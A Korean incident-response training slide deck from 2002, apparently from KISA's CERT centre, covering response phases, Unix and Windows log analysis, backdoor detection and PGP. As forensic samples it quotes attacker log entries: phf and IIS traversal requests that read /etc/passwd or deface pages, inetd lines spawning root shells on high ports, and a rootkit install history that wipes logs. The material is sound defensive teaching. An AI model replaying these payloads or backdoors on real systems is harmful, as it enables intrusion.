Ä§ÇØ»ç°í¹æÁö±â¼ú°³¹ß

2002. 10. 1 정현철 hcjung@certcc.or.kr 한국정보보호진흥원해킹바이러스상담지원센터

목차 사고대응단계별처리절차 로그분석 시스템파일분석 침입흔적추적 & 백도어탐지 침해사고대응방법 PGP

사고대응단계별처리절차 Emergency Action Plan Phase 1 : Preparation Phase 2 : Identification Phase 3 : Containment Phase 4 : Eradication Phase 5 : Recovery Phase 6 : Follow-Up

사고대응단계별처리절차 Emergency Action Plan Remain Calm Take Good Notes Who, What, When, Where, How and Why Notify The Right People And Get Help Enforce A Need To Know Policy Use Out-of-Band Communications Contain The Problem Make Backups Get Rid of The Problem Get Back In Business

사고대응단계별처리절차 Phase 1 : Preparation 사고처리팀원선발및조직화 조직의재난복구계획에컴퓨터사고처리를포함 비상연락체계구축 IRT, Firewall, IDS, vendor 팀원을위한교육, 훈련 내부부서간의협조를위한지침수립 사법기관과 CIRT 팀과의인터페이스유지 준비물 Binary backup 장비, Forensic software, Fresh backup media, CD s with binaries, Hub, Laptop,

사고대응단계별처리절차 Phase 2 : Identification 사고처리를위한팀구성 해당 event가실제사고인지결정 적절한기관이나사람에게통지 CEO, 사법기관, CIRT 네트워크서비스제공자에도움요청 증거물보관에신중 Chain of Custody

사고대응단계별처리절차 Phase 3 : Containment 문제가더악화되는것을방지 네트워크분리 바이너리백업 dd, ghost, drive duplicator, 주변시스템도로그분석 패스워드교체 (sniffer 의심 ) Windows 공유제한

사고대응단계별처리절차 Phase 4 : Eradication 사고원인과증상을파악 방지대책강화 Defense in Depth 취약점분석 사고의원인제거 사고직전의깨끗한백업본을준비

사고대응단계별처리절차 Phase 5 : Recovery 악성코드가설치되지않게주의해서백업본으로 restore 시스템이정상상태로복귀확인 운영을재개하는시점은시스템소유자가결정 시스템재개후모니터링

사고대응단계별처리절차 Phase 6 : Follow-Up Follow-Up 보고서작성 Follow-Up meeting

- 로그파일분석 - 분석해야할로그 Router Log Firewall Log IDS Log System Log UNIX(Linux, Solaris, HP-UX, AIX, IRIX, ) Windows(Windows NT/2000, 95/98) Application Log Web, FTP, Sendmail,

- 로그파일분석 - 시스템별로그파일위치 디렉토리 유닉스버전 /usr/adm 국산주전산기 Ⅱ, HP-UX /var/adm /var/log 국산주전산기 Ⅲ, Solaris, AIX Linux, BSD

- 로그파일분석 - View /etc/syslog.conf # Log all kernel messages to the console. # Logging much else clutters up the screen. kern.* /dev/console # modified by hcjung 5/15/2000 *.* @172.16.2.160 # Log anything (except mail) of level info or higher. # Don't log private authentication messages! *.info;mail.none;authpriv.none /var/log/messages # The authpriv file has restricted access. authpriv.* /var/log/secure # Everybody gets emergency messages, plus log them on another # machine. *.emerg *

- 로그파일분석 - UTMP(X) 현재로그인한사용자들에대한정보 /var/run/utmp, /etc/utmp Binary file Utmp 참조명령어 who, w, whodo, users, finger # w 9:11pm up 6 days, 5:01, 5 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT chief pts/0 172.16.2.26 Mon10am 7:20m 0.19s 0.04s telnet xxx.xxx.150.39 hcjung pts/1 hcjung.kisa.or.k 5:59pm 0.00s 0.11s 0.01s w root pts/3 - Thu 3pm 5days 0.02s 0.02s -sh jys pts/6 172.16.2.159 Thu 7pm 5days 0.15s 0.04s sh./vetescan xxx.125.110.21

- 로그파일분석 - WTMP(X) 사용자들의로그인로그아웃정보 시스템의 shutdown, booting 정보 Binary file wtmp 참조명령어 : last # last rung ttyp0 xxx.146.44.117 Thu Dec 9 20:47-20:57 (00:10) moof ttyp2 98AE63EE.ipt.aol Thu Dec 9 19:24-19:30 (00:06) moof ttyp2 98AE63EE.ipt.aol Thu Dec 9 19:23-19:24 (00:00) shinsh ftp ppp-ts1-port4.sa Sun Nov 7 00:13-00:15 (00:02) hspark pts/2 147.46.76.171 Sat Nov 6 13:56-14:01 (00:05) moksoon ftp ts7-70t-18.idire Sat Nov 6 13:26-13:30 (00:03)

- 로그파일분석 - Secure 보안과인증관련메시지를포함 특히, TCP Wrapper 로부터의메시지 # tail f /var/log/secure Apr 19 23:23:35 unsecure in.telnetd[645]: connect from 172.16.2.14 Apr 19 23:23:41 unsecure login: LOGIN ON 2 BY hcjung FROM hcjung Apr 20 23:24:29 unsecure in.telnetd[1218]: refused connect from bluebird.certcc.or.kr Apr 20 23:25:27 unsecure in.telnetd[1219]: connect from 172.16.2.161 Apr 20 23:25:33 unsecure login: LOGIN ON 3 BY hcjung FROM violet93 Apr 20 23:27:18 unsecure in.telnetd[1247]: warning: /etc/hosts.allow, line 6: can't verify hostname: gethostbyname(hcjung.kisa.or.kr) failed Apr 20 23:27:18 unsecure in.telnetd[1247]: connect from 172.16.2.14 Apr 20 23:27:43 unsecure login: LOGIN ON 4 BY hcjung FROM hcjung Apr 20 23:28:51 unsecure in.ftpd[1276]: warning: /etc/hosts.allow, line 6: can't verify hostname: gethostbyname(hcjung.kisa.or.kr) failed Apr 20 23:28:51 unsecure in.ftpd[1276]: connect from 172.16.2.14

- 로그파일분석 - Loginlog 실패한로그인시도를기록 (System V 계열 ) 기본적으로설정되어있지않음 # touch loginlog # chown root loginlog # chmod 600 loginlog # tail f /var/adm/loginlog hcjung:/dev/pts/9:fri Apr 20 14:48:46 2001 hcjung:/dev/pts/9:fri Apr 20 14:48:54 2001 hcjung:/dev/pts/9:fri Apr 20 14:49:02 2001 hcjung:/dev/pts/9:fri Apr 20 14:49:11 2001 hcjung:/dev/pts/9:fri Apr 20 14:49:20 2001

- 로그파일분석 - Sulog su(substitute user) 성공 / 실패내역기록 effective UID 가변환된사용자의 UID 로변경 사용자변경내용이 utmp 와 wtmp 에반영되지않음 # tail f /var/adm/sulog SU 04/17 16:18 + pts/10 informix-root SU 04/18 09:10 - pts/8 hcjung-root SU 04/18 09:10 - pts/8 hcjung-root SU 04/18 09:10 + pts/8 hcjung-root

- 로그파일분석 - Xferlog Ftpd 를이용한파일송수신내역기록 With -l option(/etc/inetd.conf) ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l a incoming Sat Apr 21 00:53:44 2001 1 violet93.kisa.or.kr 14859 /tmp/statdx2.c a _ i r root ftp 1 root c Sat Apr 21 00:54:09 2001 1 violet93.kisa.or.kr 821 /etc/passwd a _ o r root ftp 1 root c outgoing

- 로그파일분석 - ~/.history 사용자가실행시킨명령어기록 # more ~/.bash_history mkdir." " cd." " ncftp ftp.tehcnotronic.com gunzip *.gz tar -xvf *.tar cd lrk4 make all cd.. rm -Rf lrk4 ncftp ftp.technotronic.com gunzip *.gz tar -xvf *.tar Ls rm lrk4.src.tar tar -xvf *.tar cd lrk4 make install cd.. cd.. rm -Rf." " pico /dev/ptyr mkdir /usr/sbin/mistake.dir rm /var/log/messages rm /var/log/wtmp touch /var/log/wtmp pico /etc/passwd reboot exit

- 로그파일분석 - Messages 콘솔상보여지는메시지기록 방대한정보를기록 커널에러, 리부팅메시지, 로긴실패 해킹공격기법확인 TIP : use grep(eg. Grep sadmind messages*) Apr 10 17:25:53 victim /usr/dt/bin/rpc.ttdbserverd[29906]: _Tt_file_system:: findbestmountpoint -- max_match_entry is null, aborting... Apr 10 17:25:54 victim inetd[147]: /usr/dt/bin/rpc.ttdbserverd: Segmentation Fault - core dumped Apr 10 17:26:03 victim /usr/dt/bin/rpc.ttdbserverd[8206]: iserase(): 78 Apr 10 17:26:14 victim inetd[147]: /usr/sbin/sadmind: Bus Error - core dumped Apr 10 17:26:18 victim last message repeated 1 time Apr 10 17:26:21 victim inetd[147]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 10 17:26:23 victim inetd[147]: /usr/sbin/sadmind: Hangup Apr 10 17:31:20 victim login: change password failure: No account present for user Apr 10 17:33:15 victim last message repeated 2 times Apr 10 17:40:30 victim inetd[147]: /usr/dt/bin/rpc.ttdbserverd: Killed Apr 10 17:40:30 victim inetd[147]: /usr/dt/bin/rpc.cmsd: Killed

- 로그파일분석 - Messages Amd attack signature & success messages.1:mar 11 05:20:50 xxx 27>Mar 11 05:20:50 amd[468]: amq requested mount of 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱 ^N 됈 3 핃 F^L 뉶 ^W 뉶 ^Z?K? 腕 18 Jan 1998--str/bin/sh(-c)/bin/echo '2222? stream tcp nowait root /bin/sh s 릱릱릱릱릱릱먮 (^ [/tmp]# ls -l -rw-rw-rw- 1 root root 116 Mar 11 05:20 h [/tmp]# more h 2222 stream tcp nowait root /bin/sh sh -i 2222 stream tcp nowait root /bin/sh sh -i

- 로그파일분석 - access_log or error_log 웹서비스관련로그 CGI 취약점스캔이나공격탐지 xxx.xxx.xxx.xxx - - [16/Jun/1998:10:38:02 +0900] "GET /cgibin/phf?qname=root%0acat%20/etc/passwd HTTP/1.1" 200 114873 xxx.xxx.xxx.xxx - - [16/Jun/1998:20:11:47 +0900] "GET /cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 114889 xxx.xxx.xxx.xxx - - [17/Jun/1998:15:37:11 +0900] "GET /cgi-bin/p hf?qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 114889 xxx.xxx.xxx.xxx - - [18/Jun/1998:09:56:49 +0900] "GET /cgi -bin/phf/?qalias=x%0acat%20/etc/passwd HTTP/1.1" 200 114884

- 로그파일분석 (Windows)- IIS 로그 MS 의 IIS 서비스 (Web, FTP, Gopher) 관련로그 C:\WINNT\System32\LogFiles 2001-05-01 16:25:44 128.163.197.4 - xxx.xxx.139.225 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir+..\ 200 2001-05-01 16:25:45 128.163.197.4 - xxx.xxx.139.225 80 GET /scripts/..\../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 2001-05-01 16:25:49 128.163.197.4 - xxx.xxx.139.225 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<tabl e+width%3d100%^>^<td^>^<p+align%3d%22center%22^>^<font+size%3d7+color%3dred^>fuc k+usa+government^</font^>^<tr^>^<td^>^<p+align%3d%22center%22^>^<font+size%3d7+col or%3dred^>fuck+poizonbox^<tr^>^<td^>^<p+align%3d%22center%22^>^<font+size%3d4+colo r%3dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././index.asp 502 -

- 로그파일분석 (Windows)- IIS 로그

- 로그파일분석 (Windows)- Event Log 관리도구 사용자관리자 정책 감사

- 로그파일분석 (Windows)- Event Log

- 시스템파일분석 - /etc/passwd, /etc/shadow /etc/rc* /var/spool/cron, /etc/crontab, /etc/cron.d/ /etc/services /etc/inetd.conf

- 시스템파일분석 - /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin meteor:x:501:100::/:/bin/csh chief:x:502:502::/home/chief:/bin/bash hcjung:x:503:503::/home/hcjung:/bin/bash moof:x:0:0::/:/bin/bash rung:x:501:501::/home/rung:/bin/bash

- 시스템파일분석 - /etc/rc.d/*... 생략 rm -f /dev/fb ln -s $fbdev /dev/fb fi fi # Name Server Cache Daemon.. /usr/sbin/nscd -q #td start /usr/src/.puta/td

- 시스템파일분석 - /etc/inetd.conf ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd # # Shell, login, exec, comsat and talk are BSD protocols. # shell stream tcp nowait root /usr/sbin/tcpd in.rshd #login stream tcp nowait root /usr/sbin/tcpd in.rlogind exec stream tcp nowait root /usr/sbin/tcpd in.rexecd 2222 stream tcp nowait root /bin/bash bash -i

- 침입흔적추적 & 백도어탐지 - 피해분석시발견되는해킹도구들 Rootkit 등의백도어 Sniffer Vulnerability Scanner Exploit code DoS attack tools Log eraser IRC bot...

- 침입흔적추적 & 백도어탐지 - Hidden Files & Directorys (dot dot dot) (space space).. (dot dot space space) 특수문자를디렉토리명으로사용 Chattr changes the file attributes Root 권한으로도삭제불가

- 침입흔적추적 & 백도어탐지 - Find -ctime n : changed n*24 hours ago Find / -ctime 10 ls -type c : File is of type c Find /dev type f ls -user uname : File is owned by user uname Find / -user bad_guy ls -perm mode : File's with the permission bits Find / -user root perm 4000 -print -name pattern : files s matches the pattern

- 침입흔적추적 & 백도어탐지 - Netstat Listen 포트와 connection 상황확인 # netstat -a -p Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 insecure.kisa.or.k:9704 bluebird.certcc.o:62491 ESTABLISHED 1660/sh tcp 0 0 *:9704 *:* LISTEN 340/inetd tcp 0 0 *:6000 *:* LISTEN 514/Xwrapper tcp 0 0 *:www *:* LISTEN 474/httpd tcp 0 0 *:login *:* LISTEN 340/inetd tcp 0 0 *:shell *:* LISTEN 340/inetd tcp 0 0 *:telnet *:* LISTEN 340/inetd tcp 0 0 *:ftp *:* LISTEN 340/inetd # tail /etc/inetd.conf linuxconf stream tcp wait root /bin/linuxconf linuxconf --http 9704 stream tcp nowait root /bin/sh sh -i

- 침입흔적추적 & 백도어탐지 - Ps 실행중인프로세스리스트 # ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND hcjung 649 0.0 0.7 1704 948 pts/2 S Apr19 0:00 -bash root 661 0.0 0.6 1944 860 pts/2 S Apr19 0:00 su - root 662 0.0 0.7 1744 1000 pts/2 S Apr19 0:00 -bash root 1279 0.0 1.5 4176 1976 tty1 S Apr20 0:00 hanterm root 1281 0.0 0.7 1744 984 pts/4 S Apr20 0:00 -bash root 1421 0.0 0.5 1584 744 pts/0 S 02:06 0:00 telnet 172.16.2.161 root 1732 0.0 0.6 1676 884? S 06:01 0:00 sh -i root 1735 0.0 0.2 1116 376? SN 06:02 0:00./synf 1.1.1.1 172.16.1.161 80 80

- 침입흔적추적 & 백도어탐지 - Rootkit 재침입이나해킹사실은폐를위한트로이목마프로그램들의패키지 반드시시스템복구시에시스템파일무결성검증필요 Rootkit 에의해변경되는파일들 Login, inetd, rshd, tcpd, crontab, ps, top, pidof, ifconfig, netstat, ls, du, find, syslogd, shell, chfn, chsh, passwd, 커널백도어 KNARK, ADORE,

- 침입흔적추적 & 백도어탐지 - Find troyjaned files ls alc truss t open./ls (Solaris) strace e trace=open./ls (Linux) [root@ns1 /bin]# strace -e trace=open ps open("/lib/libc.so.6", O_RDONLY) = 3 open("/dev/null", O_RDONLY O_NONBLOCK 0x10000) = -1 ENOTDIR (Not a directory) open("/usr/src/.puta/.1file", O_RDONLY) = 3 open(".", O_RDONLY O_NONBLOCK 0x10000) = 3 [root@ns1 /bin]# more /usr/src/.puta/.1file.1addr.1file.1logz.1proc smurf

침해사고대응방법 침해사고대응수단 공격사이트차단 서비스거부공격에이용될우려가있음 DOS 공격 / 지속적공격일경우사용 역공격 공격시스템을역으로공격, 미국 DOD 관련사이트발견 일반 PC 사용자들의메일폭탄공격등 E-mail 대응 CERT 간에사용되는대응방법 공격시스템또한또다른해킹의피해자일경우가많으므로 E-mail 을통하여공격사실통지및조사요청

침해사고대응방법 공격사이트연락처찾기 도메인주소 /IP 주소변환 # nslookup 211.32.119.135 Server: certcc.or.kr Address: 211.252.150.1 Name: www.yahoo.co.kr Address: 211.32.119.135 # nslookup www.yahoo.co.kr...

침해사고대응방법 공격사이트연락처찾기 Whois 이용 whois -h whois.server.name domain.name whois -h whois.server.name ip.address whois 서버 whois.arin.net : 최상위도메인정보제공 whois.apnic.net : ASIA-PACIFIC 지역도메인정보제공 whois.ripe.net : 유럽지역의도메인정보제공 whois.krnic.net : 국내도메인 (kr) 정보제공

침해사고대응방법 공격사이트연락처찾기 Traceroute 사용 공격사이트연락처를찾기힘든경우 공격사이트로부터답장이오지않는경우 $ traceroute host3.example-site.edu traceroute to host3.example-site.edu (10.72.0.176), 30 hops max 1 hop1.reporting-site.com (10.112.1.2) 2 ms 2 ms 1 ms 2 hop2.transit-network.net (10.288.114.254) 2 ms 2 ms 2 ms 3 hop3.transit-network.net (10.224.137.21) 3 ms 3 ms 5 ms... 10 hop10.example-site.edu (10.192.33.3) 24 ms 26 ms 26 ms 11 hop11.example-site.edu (10.72.0.11) 27 ms 25 ms 27 ms 12 host3.example-site.edu (10.72.0.176) 26 ms 27 ms 26 ms

침해사고대응방법 공격사이트연락처찾기 Netlab Finger, whois, ping, traceroute, DNS, Port scan

침해사고대응방법 공격사이트연락처찾기 Visualroute Visual traceroute

침해사고대응방법 침해사고대응팀 (CERT) 에연락하기 공격사이트와관련된지역의침해사고대응팀에연락 http://www.first.org/team-info/ 국내 : cert@certcc.or.kr

침해사고대응방법 E-mail 관련로그정보등을교환할수있는효율적인방법 정보공유제공 CC : cert@certcc.or.kr 전화 security@domain.name - 보안관련사고담당자메일주소 cert@domain.name - 보안관련사고담당자메일주소 abuse@domain.name - 네트워크오용담당자메일주소 root@domain.name - 유닉스시스템관리자주소 postmaster@domain.name - E-mail 관리자주소 webmaster@domain.name - 웹서버관리자주소 ip@domain.name - ISP의도메인할당관리자 민감하거나빠른조치가필요한사고시에직접연락하여조치

침해사고대응방법 사고분석도구 Netlab http://www.listsoft.com/eng/programs/pr134.htm Visualroute Lsof http://www.visualroute.com ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/ Tripwire http://www.tripwire.com/ Tcpdump Snoop http://www.tcpdump.org

PGP PGP? Pretty Good Privacy 1991 년미국의 Phil Zimmermann 에의해개발된전자우편보안도구

PGP 대표적인기능 암호화 기밀성 전자서명 무결성, 사용자인증, 부인봉쇄 RSA, Diffie-Hellman/DSS 사용 공개키기반 Cumulative trust 사용

PGP 공개 PGP 다운로드 http://www.pgpi.org/ 설치및사용법 PGP 6.5.1 설치및운영가이드 http://www.certcc.or.kr/tools/pgp.html

침해사고대응팀 (CERT) 구축 운영과정 PGP-Encrypt-

침해사고대응팀 (CERT) 구축 운영과정 PGP-Sign-

침해사고대응팀 (CERT) 구축 운영과정 PGP-Decrypt & Verify- <Decrypt> <Verify>

침해사고대응팀 (CERT) 구축 운영과정 Q & A